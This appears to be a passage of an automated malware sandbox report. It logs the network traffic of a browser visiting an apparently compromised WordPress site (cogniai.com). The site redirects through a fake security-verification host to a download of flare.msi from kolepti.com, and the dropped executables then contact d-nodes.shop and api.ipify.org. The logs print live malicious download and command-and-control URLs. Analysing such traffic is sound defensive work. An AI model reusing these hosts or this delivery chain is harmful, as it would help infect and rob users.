              Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imageaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
              Source: global trafficHTTP traffic detected: GET /log-click HTTP/1.1host: security.flaweguaard.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /f1E2d3C4b5A6f7E8d9C0b1A2f3E4d5C6 HTTP/1.1host: security.flaweguaard.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: secret_access=976580a2-df33-40c1-a707-2d3dce728313priority: u=1, i
              Source: global trafficHTTP traffic detected: GET /?verified=true HTTP/1.1host: cogniai.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
              Source: global trafficHTTP traffic detected: GET /flare.msi HTTP/1.1host: kolepti.comaccept: */*user-agent: Windows Installer
              Source: global trafficHTTP traffic detected: GET /12180 HTTP/1.1host: cogniai.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://cogniai.com/?verified=trueaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2, i
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.22631.4169/0?CH=902&L=en-US&P=&PT=0x30&WUA=1220.2407.15022.0&MK=4Orv2MymLvHkm74&MD=aW4zM21e HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/1220.2407.15022.0 Client-Protocol/2.80
              Source: global trafficHTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
              Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
              Source: chrome.exe, 00000000.00000002.1953863051.0000016686FBD000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: cogniai.com
              Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
              Source: global trafficDNS traffic detected: DNS query: analytiwave.com
              Source: global trafficDNS traffic detected: DNS query: analytiscnode.com
              Source: global trafficDNS traffic detected: DNS query: security.flaweguaard.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: kolepti.com
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: global trafficDNS traffic detected: DNS query: d-nodes.shop
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: c.pki.goog
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: unknownHTTP traffic detected: POST /report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D HTTP/1.1host: a.nel.cloudflare.comcontent-length: 391content-type: application/reports+jsonorigin: https://analytiwave.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:34 GMTcontent-type: application/json; charset=utf-8server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=6cd1SddvBaFkfY4vp4z6squzRBnh4p8blvvJ6JFDBEHvgD4KToeL2%2FBNggV0XdBPQbUhRY%2B3KYBg%2FBfxSrbMAXAWSk8UlUXZPLs%2Fagw%3D"}]}content-encoding: zstdcf-ray: 9470b486cbad5287-LAXalt-svc: h3=":443"; ma=86400content-length: 32
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:35 GMTcontent-type: application/json; charset=utf-8server: cloudflarex-powered-by: Expressaccess-control-allow-origin: *etag: W/"17-ynud/rIoUFgqOK7lQmDhSVVNfYI"cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=SNOJ%2FAAiXyeQWgMTm%2FYtopTmm83K5zZK2upxpUL1K3%2B3rDK1BxMmq0zyrInO2%2BPXtc27%2FUEv19AN788ajKLGqZ5ZekFeiKTfFTg%2Fxwo%3D"}]}content-encoding: zstdcf-ray: 9470b48e4b0d5287-LAXalt-svc: h3=":443"; ma=86400content-length: 32
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:38 GMTcontent-type: text/html; charset=UTF-8server: cloudflarenel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}x-powered-by: Expresscache-control: public, max-age=14400last-modified: Tue, 08 Apr 2025 17:07:02 GMTvary: accept-encodingreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZaIIvSeAGiK3%2BcnQBOtJ5yd1Kby1P3fDgzj770H%2BLf2UgitpLtacr47jCAWfFCxFJ2bQDiQvf4XoknD4HAE8e0bKJRaNn32vP5NOMyTYE5GrOV06hUc%3D"}]}cf-cache-status: EXPIREDcontent-encoding: zstdcf-ray: 9470b49b1bcdef75-LAXalt-svc: h3=":443"; ma=86400content-length: 818
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:49 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=U6%2BpPN4QrUqNeOoDBy5jKD%2BMA%2FvWQ4Vytwil%2FieDjf8hA0BhPSJWKCyAgJ07TM%2F2ogTtLe1TDetLXTnRrYT9RB0pg0lkZx4gI4sgEwS6QngKM%2BqtJFw%3D"}]}cf-cache-status: DYNAMICvary: accept-encodingcontent-encoding: zstdcf-ray: 9470b4e52cf3ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 818
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 28 May 2025 21:04:52 GMTcontent-type: text/html; charset=UTF-8server: cloudflarex-powered-by: Expresscache-control: public, max-age=0last-modified: Tue, 08 Apr 2025 17:07:02 GMTnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Q5q4U%2B7%2B0gJ%2BU69ifrDhI5qSXA8VF2m%2FqT0iMPpYPWDOgYucPstlLjk5LSJyVN5MPf%2B22qpu252wpc7loHbLsejebyVZA3%2B8RsI1lwjF2R67g9beZStpww%3D%3D"}]}cf-cache-status: DYNAMICvary: accept-encodingcontent-encoding: zstdcf-ray: 9470b4f25a8fcb93-LAXalt-svc: h3=":443"; ma=86400content-length: 818
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:53 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=xC0Q7Hi4noyunanxx%2FEUH%2BThVgxmACj7A%2BzdvsTniW%2B60q2XGhA24GuYl%2FUOVLbIxgOA1OJpZCN95OAAEPSMB1D71CyrygXDjZLDk%2BGEnfFcG8WwEEU%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b4ff4d8def75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:54 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Jq7YzULR4Pxb4qUCsV9dXOdNv7gRprFj9pDbvsbt5uMyIN%2BVhPRIjF9fLdz5usQkexJ05kvLTMBjdb%2BGHl72mDLaa6xyXl8h2lfXl%2FYD6%2FgsPOqL81s%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5023c92ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:54 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=7pCkIbuubRvwGrJJUW7paT4nM38Gb2kvKEra28Jh7jZ9VpYK%2BZr8VGnuXXrPQcrcR1Z9Tdbw7ykZW8ygDoUl4fNAl6R6gpiV5csWJwmB0kg9MhyY%2FXI%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5054b5def75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 28 May 2025 21:04:55 GMTcontent-type: text/html; charset=utf-8server: cloudflarex-powered-by: Expressreport-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=fsMtKzRm9WdDPE6bIuQUOZcNFr%2FsL3pO2FNWo42L4R7YN8tVPnFR26%2F8YC8nyQdNdS%2FaNcQzSMxV4l3mbtvq%2BOQ8mS3Yp8Ai49%2BPKnUNgnQkyWwxy40%3D"}]}cf-cache-status: DYNAMICnel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}content-encoding: zstdcf-ray: 9470b5088b05ef75-LAXalt-svc: h3=":443"; ma=86400content-length: 22
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8x-ws-ratelimit-limit: 1000x-ws-ratelimit-remaining: 999date: Wed, 28 May 2025 21:04:56 GMTserver: Apachex-powered-by: PHP/8.1.32content-encoding: gzipcontent-length: 36261
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8x-ws-ratelimit-limit: 1000x-ws-ratelimit-remaining: 998date: Wed, 28 May 2025 21:04:56 GMTserver: Apachex-powered-by: PHP/8.1.32content-encoding: gzipcontent-length: 32005
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
              Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=71vzwGo%2Fhm%2FpDed9cgryHnFL4kUcpE9%2FU2dfsEHZyIoiO3Nv5l89b
              Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=zuflUyn6wpns%2BQxm6uLfjcnmMTjpCzagZEPQ5ZiJ00wYgmh1BDB91s43N
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://analytiscnode.com/
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://analytiscnode.com/A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgP
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgmV
              Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/
              Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/12180
              Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/?verified=true
              Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/?verified=true(
              Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/?verified=trueFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n
              Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/?verified=truebmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9h
              Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/wp-content/themes/techze/custom.js?ver=1
              Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1
              Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1
              Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png
              Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/asuacrsguc:50:0
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0cross-origin-opener-policy-report-only:sam
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
              Source: cmd.exe, 0000001D.00000003.1732104353.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1743385571.0000022607DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://fonts.gstatic.com
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://fonts.gstatic.com/
              Source: chrome.exe, 00000000.00000002.1959321274.0000016688AFC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmpString found in binary or memory: https://kolepti.com/flare.msi
              Source: chrome.exe, 00000000.00000002.1960138926.0000016688C6A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb25
              Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmpString found in binary or memory: https://www.google.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
              Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
